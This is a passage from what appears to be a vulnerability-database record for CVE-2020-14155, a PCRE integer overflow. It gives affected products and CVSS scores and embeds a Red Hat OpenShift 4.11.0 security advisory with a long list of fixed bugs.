2006044 - CVE-2021-39293 golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196)
2016640 - CVE-2020-27304 civetweb: directory traversal when using the built-in example HTTP form-based file upload mechanism via the mg_handle_form_request API
- JIRA issues fixed (https://issues.jboss.org/):
RHACS-65 - Release RHACS 3.67.0
- In addition to persistent storage, Red Hat OpenShift Container Storage provides a multicloud data management service with an S3 compatible API.
Bug Fix(es):
- Previously, when the namespace store target was deleted, no alert was sent for the namespace bucket because of an issue in calculating the namespace bucket health. With this update, the issue in calculating the namespace bucket health is fixed and alerts are triggered as expected. (BZ#1993873)
- Previously, the Multicloud Object Gateway (MCG) components performed slowly and there was a lot of pressure on the MCG components due to non-optimized database queries. With this update, the non-optimized database queries are fixed, which reduces the compute resources and time taken for queries.

- Bugs fixed (https://bugzilla.redhat.com/):
1993873 - [4.8.z clone] Alert NooBaaNamespaceBucketErrorState is not triggered when namespacestore's target bucket is deleted
2006958 - CVE-2020-26301 nodejs-ssh2: Command injection by calling vulnerable method with untrusted input
- Description:
This release adds the new Apache HTTP Server 2.4.37 Service Pack 10 packages that are part of the JBoss Core Services offering.

- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202006-0222",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "steelstore cloud integrated storage",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.0"
},
{
"model": "gitlab",
"scope": "gte",
"trust": 1.0,
"vendor": "gitlab",
"version": "13.1.0"
},
{
"model": "gitlab",
"scope": "lt",
"trust": 1.0,
"vendor": "gitlab",
"version": "12.10.13"
},
{
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.12"
},
{
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "pcre",
"scope": "lt",
"trust": 1.0,
"vendor": "pcre",
"version": "8.44"
},
{
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "ontap select deploy administration utility",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "communications cloud native core policy",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.0"
},
{
"model": "gitlab",
"scope": "lt",
"trust": 1.0,
"vendor": "gitlab",
"version": "13.1.2"
},
{
"model": "active iq unified manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "universal forwarder",
"scope": "eq",
"trust": 1.0,
"vendor": "splunk",
"version": "9.1.0"
},
{
"model": "gitlab",
"scope": "lt",
"trust": 1.0,
"vendor": "gitlab",
"version": "13.0.8"
},
{
"model": "gitlab",
"scope": "gte",
"trust": 1.0,
"vendor": "gitlab",
"version": "13.0.0"
},
{
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.6"
},
{
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.0"
},
{
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "11.0.1"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-14155"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "168042"
},
{
"db": "PACKETSTORM",
"id": "164825"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "165135"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165096"
},
{
"db": "PACKETSTORM",
"id": "164927"
},
{
"db": "PACKETSTORM",
"id": "165862"
}
],
"trust": 0.8
},
"cve": "CVE-2020-14155",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2020-14155",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-167005",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2020-14155",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-14155",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202006-1036",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-167005",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-167005"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-1036"
},
{
"db": "NVD",
"id": "CVE-2020-14155"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "libpcre in PCRE before 8.44 allows an integer overflow via a large number after a (?C substring. PCRE is an open source regular expression library written in C language by Philip Hazel software developer. An input validation error vulnerability exists in libpcre in versions prior to PCRE 8.44. An attacker could exploit this vulnerability to execute arbitrary code or cause an application to crash on the system with a large number of requests. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Important: OpenShift Container Platform 4.11.0 bug fix and security update\nAdvisory ID: RHSA-2022:5069-01\nProduct: Red Hat OpenShift Enterprise\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:5069\nIssue date: 2022-08-10\nCVE Names: CVE-2018-25009 CVE-2018-25010 CVE-2018-25012\n CVE-2018-25013 CVE-2018-25014 CVE-2018-25032\n CVE-2019-5827 CVE-2019-13750 CVE-2019-13751\n CVE-2019-17594 CVE-2019-17595 CVE-2019-18218\n CVE-2019-19603 CVE-2019-20838 CVE-2020-13435\n CVE-2020-14155 CVE-2020-17541 CVE-2020-19131\n CVE-2020-24370 CVE-2020-28493 CVE-2020-35492\n CVE-2020-36330 CVE-2020-36331 CVE-2020-36332\n CVE-2021-3481 CVE-2021-3580 CVE-2021-3634\n CVE-2021-3672 CVE-2021-3695 CVE-2021-3696\n CVE-2021-3697 CVE-2021-3737 CVE-2021-4115\n CVE-2021-4156 CVE-2021-4189 CVE-2021-20095\n CVE-2021-20231 CVE-2021-20232 CVE-2021-23177\n CVE-2021-23566 CVE-2021-23648 CVE-2021-25219\n CVE-2021-31535 CVE-2021-31566 CVE-2021-36084\n CVE-2021-36085 CVE-2021-36086 CVE-2021-36087\n CVE-2021-38185 CVE-2021-38593 CVE-2021-40528\n CVE-2021-41190 CVE-2021-41617 CVE-2021-42771\n CVE-2021-43527 CVE-2021-43818 CVE-2021-44225\n CVE-2021-44906 CVE-2022-0235 CVE-2022-0778\n CVE-2022-1012 CVE-2022-1215 CVE-2022-1271\n CVE-2022-1292 CVE-2022-1586 CVE-2022-1621\n CVE-2022-1629 CVE-2022-1706 CVE-2022-1729\n CVE-2022-2068 CVE-2022-2097 CVE-2022-21698\n CVE-2022-22576 CVE-2022-23772 
CVE-2022-23773\n CVE-2022-23806 CVE-2022-24407 CVE-2022-24675\n CVE-2022-24903 CVE-2022-24921 CVE-2022-25313\n CVE-2022-25314 CVE-2022-26691 CVE-2022-26945\n CVE-2022-27191 CVE-2022-27774 CVE-2022-27776\n CVE-2022-27782 CVE-2022-28327 CVE-2022-28733\n CVE-2022-28734 CVE-2022-28735 CVE-2022-28736\n CVE-2022-28737 CVE-2022-29162 CVE-2022-29810\n CVE-2022-29824 CVE-2022-30321 CVE-2022-30322\n CVE-2022-30323 CVE-2022-32250\n====================================================================\n1. Summary:\n\nRed Hat OpenShift Container Platform release 4.11.0 is now available with\nupdates to packages and images that fix several bugs and add enhancements. \n\nThis release includes a security update for Red Hat OpenShift Container\nPlatform 4.11. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.11.0. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHSA-2022:5068\n\nSpace precludes documenting all of the container images in this advisory. 
\nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html\n\nSecurity Fix(es):\n\n* go-getter: command injection vulnerability (CVE-2022-26945)\n* go-getter: unsafe download (issue 1 of 3) (CVE-2022-30321)\n* go-getter: unsafe download (issue 2 of 3) (CVE-2022-30322)\n* go-getter: unsafe download (issue 3 of 3) (CVE-2022-30323)\n* nanoid: Information disclosure via valueOf() function (CVE-2021-23566)\n* sanitize-url: XSS (CVE-2021-23648)\n* minimist: prototype pollution (CVE-2021-44906)\n* node-fetch: exposure of sensitive information to an unauthorized actor\n(CVE-2022-0235)\n* prometheus/client_golang: Denial of service using\nInstrumentHandlerCounter (CVE-2022-21698)\n* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)\n* go-getter: writes SSH credentials into logfile, exposing sensitive\ncredentials to local uses (CVE-2022-29810)\n* opencontainers: OCI manifest and index parsing confusion (CVE-2021-41190)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. 
\n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.11.0-x86_64\n\nThe image digest is\nsha256:300bce8246cf880e792e106607925de0a404484637627edf5f517375517d54a4\n\n(For aarch64 architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.11.0-aarch64\n\nThe image digest is\nsha256:29fa8419da2afdb64b5475d2b43dad8cc9205e566db3968c5738e7a91cf96dfe\n\n(For s390x architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.11.0-s390x\n\nThe image digest is\nsha256:015d6180238b4024d11dfef6751143619a0458eccfb589f2058ceb1a6359dd46\n\n(For ppc64le architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.11.0-ppc64le\n\nThe image digest is\nsha256:5052f8d5597c6656ca9b6bfd3de521504c79917aa80feb915d3c8546241f86ca\n\nAll OpenShift Container Platform 4.11 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html\n\n3. Solution:\n\nFor OpenShift Container Platform 4.11 see the following documentation,\nwhich will be updated shortly for this release, for important instructions\non how to upgrade your cluster and fully apply this asynchronous errata\nupdate:\n\nhttps://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html\n\n4. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1817075 - MCC \u0026 MCO don\u0027t free leader leases during shut down -\u003e 10 minutes of leader election timeouts\n1822752 - cluster-version operator stops applying manifests when blocked by a precondition check\n1823143 - oc adm release extract --command, --tools doesn\u0027t pull from localregistry when given a localregistry/image\n1858418 - [OCPonRHV] OpenShift installer fails when Blank template is missing in oVirt/RHV\n1859153 - [AWS] An IAM error occurred occasionally during the installation phase: Invalid IAM Instance Profile name\n1896181 - [ovirt] install fails: due to terraform error \"Cannot run VM. VM is being updated\" on vm resource\n1898265 - [OCP 4.5][AWS] Installation failed: error updating LB Target Group\n1902307 - [vSphere] cloud labels management via cloud provider makes nodes not ready\n1905850 - `oc adm policy who-can` failed to check the `operatorcondition/status` resource\n1916279 - [OCPonRHV] Sometimes terraform installation fails on -failed to fetch Cluster(another terraform bug)\n1917898 - [ovirt] install fails: due to terraform error \"Tag not matched: expect \u003cfault\u003e but got \u003chtml\u003e\" on vm resource\n1918005 - [vsphere] If there are multiple port groups with the same name installation fails\n1918417 - IPv6 errors after exiting crictl\n1918690 - Should update the KCM resource-graph timely with the latest configure\n1919980 - oVirt installer fails due to terraform error \"Failed to wait for Templte(...) 
to become ok\"\n1921182 - InspectFailed: kubelet Failed to inspect image: rpc error: code = DeadlineExceeded desc = context deadline exceeded\n1923536 - Image pullthrough does not pass 429 errors back to capable clients\n1926975 - [aws-c2s] kube-apiserver crashloops due to missing cloud config\n1928932 - deploy/route_crd.yaml in openshift/router uses deprecated v1beta1 CRD API\n1932812 - Installer uses the terraform-provider in the Installer\u0027s directory if it exists\n1934304 - MemoryPressure Top Pod Consumers seems to be 2x expected value\n1943937 - CatalogSource incorrect parsing validation\n1944264 - [ovn] CNO should gracefully terminate OVN databases\n1944851 - List of ingress routes not cleaned up when routers no longer exist - take 2\n1945329 - In k8s 1.21 bump conntrack \u0027should drop INVALID conntrack entries\u0027 tests are disabled\n1948556 - Cannot read property \u0027apiGroup\u0027 of undefined error viewing operator CSV\n1949827 - Kubelet bound to incorrect IPs, referring to incorrect NICs in 4.5.x\n1957012 - Deleting the KubeDescheduler CR does not remove the corresponding deployment or configmap\n1957668 - oc login does not show link to console\n1958198 - authentication operator takes too long to pick up a configuration change\n1958512 - No 1.25 shown in REMOVEDINRELEASE for apis audited with k8s.io/removed-release 1.25 and k8s.io/deprecated true\n1961233 - Add CI test coverage for DNS availability during upgrades\n1961844 - baremetal ClusterOperator installed by CVO does not have relatedObjects\n1965468 - [OSP] Delete volume snapshots based on cluster ID in their metadata\n1965934 - can not get new result with \"Refresh off\" if click \"Run queries\" again\n1965969 - [aws] the public hosted zone id is not correct in the destroy log, while destroying a cluster which is using BYO private hosted zone. 
1968253 - GCP CSI driver can provision volume with access mode ROX
1969794 - [OSP] Document how to use image registry PVC backend with custom availability zones
1975543 - [OLM] Remove stale cruft installed by CVO in earlier releases
1976111 - [tracker] multipathd.socket is missing start conditions
1976782 - Openshift registry starts to segfault after S3 storage configuration
1977100 - Pod failed to start with message "set CPU load balancing: readdirent /proc/sys/kernel/sched_domain/cpu66/domain0: no such file or directory"
1978303 - KAS pod logs show: [SHOULD NOT HAPPEN] ...failed to convert new object...CertificateSigningRequest) to smd typed: .status.conditions: duplicate entries for key [type="Approved"]
1978798 - [Network Operator] Upgrade: The configuration to enable network policy ACL logging is missing on the cluster upgraded from 4.7->4.8
1979671 - Warning annotation for pods with cpu requests or limits on single-node OpenShift cluster without workload partitioning
1982737 - OLM does not warn on invalid CSV
1983056 - IP conflict while recreating Pod with fixed name
1984785 - LSO CSV does not contain disconnected annotation
1989610 - Unsupported data types should not be rendered on operand details page
1990125 - co/image-registry is degraded because ImagePrunerDegraded: Job has reached the specified backoff limit
1990384 - 502 error on "Observe -> Alerting" UI after disabled local alertmanager
1992553 - all the alert rules' annotations "summary" and "description" should comply with the OpenShift alerting guidelines
1994117 - Some hardcodes are detected at the code level in orphaned code
1994820 - machine controller doesn't send vCPU quota failed messages to cluster install logs
1995953 - Ingresscontroller change the replicas to scaleup first time will be rolling update for all the ingress pods
1996544 - AWS region ap-northeast-3 is missing in installer prompt
1996638 - Helm operator manager container restart when CR is creating&deleting
1997120 - test_recreate_pod_in_namespace fails - Timed out waiting for namespace
1997142 - OperatorHub: Filtering the OperatorHub catalog is extremely slow
1997704 - [osp][octavia lb] given loadBalancerIP is ignored when creating a LoadBalancer type svc
1999325 - FailedMount MountVolume.SetUp failed for volume "kube-api-access" : object "openshift-kube-scheduler"/"kube-root-ca.crt" not registered
1999529 - Must gather fails to gather logs for all the namespace if server doesn't have volumesnapshotclasses resource
1999891 - must-gather collects backup data even when Pods fails to be created
2000653 - Add hypershift namespace to exclude namespaces list in descheduler configmap
2002009 - IPI Baremetal, qemu-convert takes too long to save image into drive on slow/large disks
2002602 - Storageclass creation page goes blank when "Enable encryption" is clicked if there is a syntax error in the configmap
2002868 - Node exporter not able to scrape OVS metrics
2005321 - Web Terminal is not opened on Stage of DevSandbox when terminal instance is not created yet
2005694 - Removing proxy object takes up to 10 minutes for the changes to propagate to the MCO
2006067 - Objects are not valid as a React child
2006201 - ovirt-csi-driver-node pods are crashing intermittently
2007246 - Openshift Container Platform - Ingress Controller does not set allowPrivilegeEscalation in the router deployment
2007340 - Accessibility issues on topology - list view
2007611 - TLS issues with the internal registry and AWS S3 bucket
2007647 - oc adm release info --changes-from does not show changes in repos that squash-merge
2008486 - Double scroll bar shows up on dragging the task quick search to the bottom
2009345 - Overview page does not load from openshift console for some set of users after upgrading to 4.7.19
2009352 - Add image-registry usage metrics to telemeter
2009845 - Respect overrides changes during installation
2010361 - OpenShift Alerting Rules Style-Guide Compliance
2010364 - OpenShift Alerting Rules Style-Guide Compliance
2010393 - [sig-arch][Late] clients should not use APIs that are removed in upcoming releases [Suite:openshift/conformance/parallel]
2011525 - Rate-limit incoming BFD to prevent ovn-controller DoS
2011895 - Details about cloud errors are missing from PV/PVC errors
2012111 - LSO still try to find localvolumeset which is already deleted
2012969 - need to figure out why osupdatedstart to reboot is zero seconds
2013144 - Developer catalog category links could not be open in a new tab (sharing and open a deep link works fine)
2013461 - Import deployment from Git with s2i expose always port 8080 (Service and Pod template, not Route) if another Route port is selected by the user
2013734 - unable to label downloads route in openshift-console namespace
2013822 - ensure that the `container-tools` content comes from the RHAOS plashets
2014161 - PipelineRun logs are delayed and stuck on a high log volume
2014240 - Image registry uses ICSPs only when source exactly matches image
2014420 - Topology page is crashed
2014640 - Cannot change storage class of boot disk when cloning from template
2015023 - Operator objects are re-created even after deleting it
2015042 - Adding a template from the catalog creates a secret that is not owned by the TemplateInstance
2015356 - Different status shows on VM list page and details page
2015375 - PVC creation for ODF/IBM Flashsystem shows incorrect types
2015459 - [azure][openstack]When image registry configure an invalid proxy, registry pods are CrashLoopBackOff
2015800 - [IBM]Shouldn't change status.storage.bucket and status.storage.resourceKeyCRN when update spec.storage.ibmcos with invalid value
2016425 - Adoption controller generating invalid metadata.Labels for an already adopted Subscription resource
2016534 - externalIP does not work when egressIP is also present
2017001 - Topology context menu for Serverless components always open downwards
2018188 - VRRP ID conflict between keepalived-ipfailover and cluster VIPs
2018517 - [sig-arch] events should not repeat pathologically expand_less failures - s390x CI
2019532 - Logger object in LSO does not log source location accurately
2019564 - User settings resources (ConfigMap, Role, RB) should be deleted when a user is deleted
2020483 - Parameter $__auto_interval_period is in Period drop-down list
2020622 - e2e-aws-upi and e2e-azure-upi jobs are not working
2021041 - [vsphere] Not found TagCategory when destroying ipi cluster
2021446 - openshift-ingress-canary is not reporting DEGRADED state, even though the canary route is not available and accessible
2022253 - Web terminal view is broken
2022507 - Pods stuck in OutOfpods state after running cluster-density
2022611 - Remove BlockPools(no use case) and Object(redundant with Overview) tab on the storagesystem page for NooBaa only and remove BlockPools tab for External mode deployment
2022745 - Cluster reader is not able to list NodeNetwork* objects
2023295 - Must-gather tool gathering data from custom namespaces.
2023691 - ClusterIP internalTrafficPolicy does not work for ovn-kubernetes
2024427 - oc completion zsh doesn't auto complete
2024708 - The form for creating operational CRs is badly rendering field names ("obsoleteCPUs" -> "Obsolete CP Us")
2024821 - [Azure-File-CSI] need more clear info when requesting pvc with volumeMode Block
2024938 - CVE-2021-41190 opencontainers: OCI manifest and index parsing confusion
2025624 - Ingress router metrics endpoint serving old certificates after certificate rotation
2026356 - [IPI on Azure] The bootstrap machine type should be same as master
2026461 - Completed pods in Openshift cluster not releasing IP addresses and results in err: range is full unless manually deleted
2027603 - [UI] Dropdown doesn't close on its own after arbiter zone selection on 'Capacity and nodes' page
2027613 - Users can't silence alerts from the dev console
2028493 - OVN-migration failed - ovnkube-node: error waiting for node readiness: timed out waiting for the condition
2028532 - noobaa-pg-db-0 pod stuck in Init:0/2
2028821 - Misspelled label in ODF management UI - MCG performance view
2029438 - Bootstrap node cannot resolve api-int because NetworkManager replaces resolv.conf
2029470 - Recover from suddenly appearing old operand revision WAS: kube-scheduler-operator test failure: Node's not achieving new revision
2029797 - Uncaught exception: ResizeObserver loop limit exceeded
2029835 - CSI migration for vSphere: Inline-volume tests failing
2030034 - prometheusrules.openshift.io: dial tcp: lookup prometheus-operator.openshift-monitoring.svc on 172.30.0.10:53: no such host
2030530 - VM created via customize wizard has single quotation marks surrounding its password
2030733 - wrong IP selected to connect to the nodes when ExternalCloudProvider enabled
2030776 - e2e-operator always uses quay master images during presubmit tests
2032559 - CNO allows migration to dual-stack in unsupported configurations
2032717 - Unable to download ignition after coreos-installer install --copy-network
2032924 - PVs are not being cleaned up after PVC deletion
2033482 - [vsphere] two variables in tf are undeclared and get warning message during installation
2033575 - monitoring targets are down after the cluster run for more than 1 day
2033711 - IBM VPC operator needs e2e csi tests for ibmcloud
2033862 - MachineSet is not scaling up due to an OpenStack error trying to create multiple ports with the same MAC address
2034147 - OpenShift VMware IPI Installation fails with Resource customization when corespersocket is unset and vCPU count is not a multiple of 4
2034296 - Kubelet and Crio fails to start during upgrade to 4.7.37
2034411 - [Egress Router] No NAT rules for ipv6 source and destination created in ip6tables-save
2034688 - Allow Prometheus/Thanos to return 401 or 403 when the request isn't authenticated
2034958 - [sig-network] Conntrack should be able to preserve UDP traffic when initial unready endpoints get ready
2035005 - MCD is not always removing in progress taint after a successful update
2035334 - [RFE] [OCPonRHV] Provision machines with preallocated disks
2035899 - Operator-sdk run bundle doesn't support arm64 env
2036202 - Bump podman to >= 3.3.0 so that setup of multiple credentials for a single registry which can be distinguished by their path will work
2036594 - [MAPO] Machine goes to failed state due to a momentary error of the cluster etcd
2036948 - SR-IOV Network Device Plugin should handle offloaded VF instead of supporting only PF
2037190 - dns operator status flaps between True/False/False and True/True/(False|True) after updating dnses.operator.openshift.io/default
2037447 - Ingress Operator is not closing TCP connections.
2037513 - I/O metrics from the Kubernetes/Compute Resources/Cluster Dashboard show as no datapoints found
2037542 - Pipeline Builder footer is not sticky and yaml tab doesn't use full height
2037610 - typo for the Terminated message from thanos-querier pod description info
2037620 - Upgrade playbook should quit directly when trying to upgrade RHEL-7 workers to 4.10
2037625 - AppliedClusterResourceQuotas can not be shown on project overview
2037626 - unable to fetch ignition file when scaleup rhel worker nodes on cluster enabled Tang disk encryption
2037628 - Add test id to kms flows for automation
2037721 - PodDisruptionBudgetAtLimit alert fired in SNO cluster
2037762 - Wrong ServiceMonitor definition is causing failure during Prometheus configuration reload and preventing changes from being applied
2037841 - [RFE] use /dev/ptp_hyperv on Azure/AzureStack
2038115 - Namespace and application bar is not sticky anymore
2038244 - Import from git ignore the given servername and could not validate On-Premises GitHub and BitBucket installations
2038405 - openshift-e2e-aws-workers-rhel-workflow in CI step registry broken
2038774 - IBM-Cloud OVN IPsec fails, IKE UDP ports and ESP protocol not in security group
2039135 - the error message is not clear when using "opm index prune" to prune a file-based index image
2039161 - Note about token for encrypted PVCs should be removed when only cluster wide encryption checkbox is selected
2039253 - ovnkube-node crashes on duplicate endpoints
2039256 - Domain validation fails when TLD contains a digit.
2039277 - Topology list view items are not highlighted on keyboard navigation
2039462 - Application tab in User Preferences dropdown menus are too wide.
2039477 - validation icon is missing from Import from git
2039589 - The toolbox command always ignores [command] the first time
2039647 - Some developer perspective links are not deep-linked causes developer to sometimes delete/modify resources in the wrong project
2040180 - Bug when adding a new table panel to a dashboard for OCP UI with only one value column
2040195 - Ignition fails to enable systemd units with backslash-escaped characters in their names
2040277 - ThanosRuleNoEvaluationFor10Intervals alert description is wrong
2040488 - OpenShift-Ansible BYOH Unit Tests are Broken
2040635 - CPU Utilisation is negative number for "Kubernetes / Compute Resources / Cluster" dashboard
2040654 - 'oc adm must-gather -- some_script' should exit with same non-zero code as the failed 'some_script' exits
2040779 - Nodeport svc not accessible when the backend pod is on a window node
2040933 - OCP 4.10 nightly build will fail to install if multiple NICs are defined on KVM nodes
2041133 - 'oc explain route.status.ingress.conditions' shows type 'Currently only Ready' but actually is 'Admitted'
2041454 - Garbage values accepted for `--reference-policy` in `oc import-image` without any error
2041616 - Ingress operator tries to manage DNS of additional ingresscontrollers that are not under clusters basedomain, which can't work
2041769 - Pipeline Metrics page not showing data for normal user
2041774 - Failing git detection should not recommend Devfiles as import strategy
2041814 - The KubeletConfigController wrongly process multiple confs for a pool
2041940 - Namespace pre-population not happening till a Pod is created
2042027 - Incorrect feedback for "oc label pods --all"
2042348 - Volume ID is missing in output message when expanding volume which is not mounted.
2042446 - CSIWithOldVSphereHWVersion alert recurring despite upgrade to vmx-15
2042501 - use lease for leader election
2042587 - ocm-operator: Improve reconciliation of CA ConfigMaps
2042652 - Unable to deploy hw-event-proxy operator
2042838 - The status of container is not consistent on Container details and pod details page
2042852 - Topology toolbars are unaligned to other toolbars
2042999 - A pod cannot reach kubernetes.default.svc.cluster.local cluster IP
2043035 - Wrong error code provided when request contains invalid argument
2043068 - <x> available of <y> text disappears in Utilization item if x is 0
2043080 - openshift-installer intermittent failure on AWS with Error: InvalidVpcID.NotFound: The vpc ID 'vpc-123456789' does not exist
2043094 - ovnkube-node not deleting stale conntrack entries when endpoints go away
2043118 - Host should transition through Preparing when HostFirmwareSettings changed
2043132 - Add a metric when vsphere csi storageclass creation fails
2043314 - `oc debug node` does not meet compliance requirement
2043336 - Creating multi SriovNetworkNodePolicy cause the worker always be draining
2043428 - Address Alibaba CSI driver operator review comments
